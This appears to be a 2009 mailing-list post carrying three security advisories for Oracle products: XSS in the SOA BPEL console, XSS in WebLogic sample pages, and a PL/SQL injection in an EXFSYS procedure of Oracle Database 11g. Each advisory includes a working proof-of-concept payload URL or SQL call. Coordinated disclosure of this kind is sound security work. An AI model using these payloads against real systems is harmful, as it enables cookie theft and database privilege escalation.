Oracle CPU Jan 2009 Advisories.
Advisories for Oracle CPU January 2009 vulnerabilities Attached.
Polyakov Alexandr
Information Security Analyst
______________________
DIGITAL SECURITY
phone: +7 812 703 1547
+7 812 430 9130
e-mail: a.polyakov@xxxxxxx
www.dsec.ru
-----------------------------------
This message and any attachment are confidential and may be privileged or
otherwise protected
from disclosure. If you are not the intended recipient any use, distribution,
copying or disclosure
is strictly prohibited. If you have received this message in error, please
notify the sender immediately
either by telephone or by e-mail and delete this message and any attachment
from your system. Correspondence
via e-mail is for information purposes only. Digital Security neither makes nor
accepts legally binding
statements by e-mail unless otherwise agreed.
-----------------------------------
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-001
Application: Oracle Application Server (SOA)
Versions Affected: Oracle Application Server (SOA) version
10.1.3.1.0
Vendor URL: http://www.oracle.com
Bugs: XSS
Exploits: YES
Reported: 10.01.2008
Vendor response: 11.01.2008
Date of Public Advisory: 13.01.2009
CVE: CVE-2008-4014
Description: XSS IN BPELCONSOLE/DEFAULT/ACTIVITIES.JSP
Author: Alexandr Polyakov
Digital Security Reasearch Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***********
Linked XSS vulnerability found in BPEL module of Oracle Application Server
(Oracle SOA Suite).
Details
*******
Linked XSS vulnerability found in BPEL module. In page
BPELConsole/default/activities.jsp attacker can inject XSS by appending it to
URL
Example
*******
http://[localhost]:8888/BPELConsole/default/activities.jsp?'><script>alert('DSEC_XSS')</script>=DSecRG
Attacker must send injected link to administrator and get adminiatrators cookie.
Code with injected XSS:
----------------------------------------------------------------
</th>
<th id="activityLabel" class="ListHeader" align="left"
nowrap>
<a
href='activities.jsp?'><script>alert('DSecRG_XSS')</script>=DSecRG&orderBy=label'
class=HeaderLink>
Activity Label
</a>
</th>
---------------------------------------------------------------------------
Fix Information
***************
Information was published in CPU January 2009.
All customers can download CPU petches following instructions from:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in
CPU January 2009.
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
About
*****
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsecrg.ru
http://www.dsec.ru
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-002
Application: Oracle BEA Weblogic 10
Versions Affected: Oracle BEA Weblogic 10
Vendor URL: http://oracle.com
Bugs: Multiple XSS Vulnerabilities in samples
Exploits: YES
Reported: 16.07.2008
Vendor response: 18.07.2008
Last response: 30.10.2008
Description: reviewService sample of WebLogic Server.
Date of Public Advisory: 13.01.2009
Authors: Alexandr Polyakov
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***********
Multiple XSS Vulnerabilities found in Oracle BEA Weblogic Server samples
version 10.2 and latest.
Details
*******
Vulnerabilities found in reviewService sample of Weblogic Server.
1. Linked XSS found in createArtist_service.jsp page. Vulnerable parameter
"name"
Example
*******
http://testserver.com:7001/reviewService/createArtist_service.jsp?name=<script>alert('DSECRG')</script>
2. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "title"
Example
*******
http://testserver.com:7001/reviewService/addBooks_session_ejb21.jsp?name=111&title=<script>alert('DSECRG')</script>
3. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"
Example
*******
http://testserver.com:7001/reviewService/addReview_service.jsp?comment=111&rating=<script>alert('DSECRG')</script>
4. Linked XSS found in addBooks_session_ejb21.jsp. Vulnerable parameter "rating"
Example
*******
http://testserver.com:7001/reviewService/addReview_session.jsp?comment=111&rating=<script>alert('DSECRG')</script>
5. Also there are a couple of XSS vulnerabilities in POST parameters in scripts:
http://testserver.com:7001/reviewService/examplesWebApp/JWS_WebService.jsp
http://testserver.com:7001/reviewService/ClientServlet
http://testserver.com:7001/reviewService/InterceptorClientServlet
http://testserver.com:7001/reviewService/createArtist_service.jsp
http://testserver.com:7001/reviewService/createArtist_session.jsp
Fix Information
***************
This is Security-In-Depth vulnerability, because was found in
samples.(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm)
Vulnerability issues that result in significant modification of Oracle code or
documentation in future releases,
but are not of such a critical nature that they are distributed in Critical
Patch Updates.
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in
Security-In-Depth program of CPU January 2009.
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
About
*****
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsecrg.ru
http://www.dsec.ru
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-003
Application: Oracle database 11G
Versions Affected: Oracle 11.1.0.6 and 10.2.0.1
Vendor URL: http://oracle.com
Bugs: PL/SQL Injections
Exploits: YES
Reported: 17.11.2008
Vendor response: 18.11.2008
Last response: 24.11.2008
Date of Public Advisory: 13.01.2009
Authors: Alexandr Polyakov
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***********
Oracle Database 11G vulnerable to PL/SQL Injection.
Vulnerability found in Extended filter system (EXFSYS).
Details
*******
PL/SQL Injection found in procedure EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS
(maybe other functions in this package)
Procedure EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS executes with rights of user
EXFSYS.
If Attacker have access to EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS. he can do
all things with EXFSYS user rights;
By default user EXFSYS have privelege "CREATE LIBRARY" and "CREATE ANY
TRIGGER". So he teoretically can get access to OS.
it can only be exploited by an attacker who is either running as a privileged
users, e.g. as EXFSYS
or SYS, or on a system where access to the EXFSYS routines has been granted to
unprivileged users so this a
defense in depth issue.
EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS has 4 parameters
TAB_OWNER
TAB_NAME
EXP_COLUMN
ASET_NM
"ASET_NM" is vulnerable to SQL Injection
Example:
*******
exec EXFSYS.DBMS_EXPFIL_DR.GET_EXPRSET_STATS('EXFSYS','EXF$VERSION','EXFVER
SION','YYYYYYY'' and 1=EVILPROC()--')
Vulnerable Request in v$sql log file
***********************************
SELECT attribute, data_type from ADM_EXPFIL_ATTRIBUTES where owner = 'EXFSYS'
and
attribute_set_name = 'YYYYYYY' and EVILPROC()=EVILPROC()--' and table_alias =
'NO' and (data_type like 'VARCHAR(%)' or data_type like 'VARCHAR2(%)'
or data_type = 'INT' or data_type = 'INTEGER' or data_type = 'NUMBER' or
data_type = 'DATE')
Fix Information
***************
This is Security-In-Depth
vulnerability.(http://www.oracle.com/technology/deploy/security/cpu/cpufaq.htm)
Vulnerability issues that result in significant modification of Oracle code or
documentation in future releases,
but are not of such a critical nature that they are distributed in Critical
Patch Updates.
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
Credits
*******
Oracle give a credits for Alexander Polyakov from Digital Security Company in
Security-In-Depth program of CPU January 2009.
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
About
*****
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsecrg.ru
http://www.dsec.ru